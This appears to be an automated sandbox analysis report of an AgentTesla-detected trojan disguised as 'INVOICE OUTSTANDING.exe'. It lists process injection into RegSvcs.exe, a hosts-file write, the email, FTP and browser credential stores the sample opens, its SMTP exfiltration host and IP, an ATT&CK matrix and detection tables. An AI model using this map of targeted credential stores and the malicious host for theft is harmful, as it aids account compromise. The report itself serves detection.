Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts

Stealing of Sensitive Information

Source: Yara match | File source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | [211] Windows Management Instrumentation | [1] Scheduled Task/Job | [211] Process Injection | [1] File and Directory Permissions Modification | [2] OS Credential Dumping | [1] File and Directory Discovery | Remote Services | [11] Archive Collected Data | Exfiltration Over Other Network Medium | [1] Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | [2] Command and Scripting Interpreter | [1] Registry Run Keys / Startup Folder | [1] Scheduled Task/Job | [1] Disable or Modify Tools | [1] Credentials in Registry | [114] System Information Discovery | Remote Desktop Protocol | [2] Data from Local System | Exfiltration Over Bluetooth | [1] Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | [1] Scheduled Task/Job | Logon Script (Windows) | [1] Registry Run Keys / Startup Folder | [1] Deobfuscate/Decode Files or Information | Security Account Manager | [311] Security Software Discovery | SMB/Windows Admin Shares | [1] Email Collection | Automated Exfiltration | [1] Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | [3] Obfuscated Files or Information | NTDS | [1] Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | [11] Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | [13] Software Packing | LSA Secrets | [131] Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | [1] Masquerading | Cached Domain Credentials | [1] Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | [131] Virtualization/Sandbox Evasion | DCSync | [1] Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | [211] Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | [1] Hidden Files and Directories | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph ID: 680571 | Sample: INVOICE OUTSTANDING.exe | Startdate: 08/08/2022 | Architecture: WINDOWS | Score: 100

Signatures on the sample: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 13 other signatures

Processes started from the sample: INVOICE OUTSTANDING.exe; kECjS.exe (two instances, each starting conhost.exe)

INVOICE OUTSTANDING.exe:
• Dropped files: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe (PE32); C:\Users\user\AppData\Local\...\tmp69D2.tmp (XML); C:\Users\user\...\INVOICE OUTSTANDING.exe.log (ASCII)
• Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
• Started: RegSvcs.exe; schtasks.exe (which started conhost.exe); BackgroundTransferHost.exe

RegSvcs.exe:
• DNS/IP: mail.oceanskylogistics.in 43.255.154.57, ports 49763, 587, AS-26496-GO-DADDY-COM-LLCUS, Singapore
• Dropped files: C:\Users\user\AppData\Roaming\...\kECjS.exe (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII)
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures

Source | Detection | Scanner | Label
INVOICE OUTSTANDING.exe | 38% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
INVOICE OUTSTANDING.exe | 100% | Avira | HEUR/AGEN.1235476
INVOICE OUTSTANDING.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | 100% | Avira | HEUR/AGEN.1235476
C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | 38% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | 0% | Metadefender |
C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | 0% | ReversingLabs |

Source | Detection | Scanner | Label
0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack | 100% | Avira | HEUR/AGEN.1235476
14.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

Source | Detection | Scanner | Label
mail.oceanskylogistics.in | 2% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.oceanskylogistics.in | 43.255.154.57 | true | true | | unknown
                    unknown
                    http://www.founder.com.cn/cnlINVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.comaCCINVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://DynDns.comDynDNSnamejidpasswordPsi/PsiRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fonts.comnINVOICE OUTSTANDING.exe, 00000000.00000003.258239730.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.galapagosdesign.com/DPleaseINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fonts.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.sandoll.co.krINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.urwpp.deDPleaseINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.founder.com.cn/cnl-sINVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.urwpp.deINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.zhongyicts.com.cnINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://Vvf6edm0NHgn8Mct.comRegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.sakkal.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comueedINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comalsdINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cnr-fINVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.comFINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comcom/pCINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.agfamonotype.INVOICE OUTSTANDING.exe, 00000000.00000003.275083576.0000000005DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.comn-uINVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/cr%XINVOICE OUTSTANDING.exe, 00000000.00000003.261782172.0000000005D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comlicINVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sandoll.co.kreINVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comaINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.come.comINVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.microft.cRegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.carterandcone.comlINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/cabarga.htmlMINVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/cabarga.htmlNINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cnINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/cabarga.htmlINVOICE OUTSTANDING.exe, 00000000.00000003.268824829.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268851153.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268730021.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268758763.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268943050.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/pCINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.267043053.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.jiyu-kobo.co.jp/INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers8INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.sajatypeworks.comdifINVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258048117.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257978730.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257944160.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258298723.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258070392.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
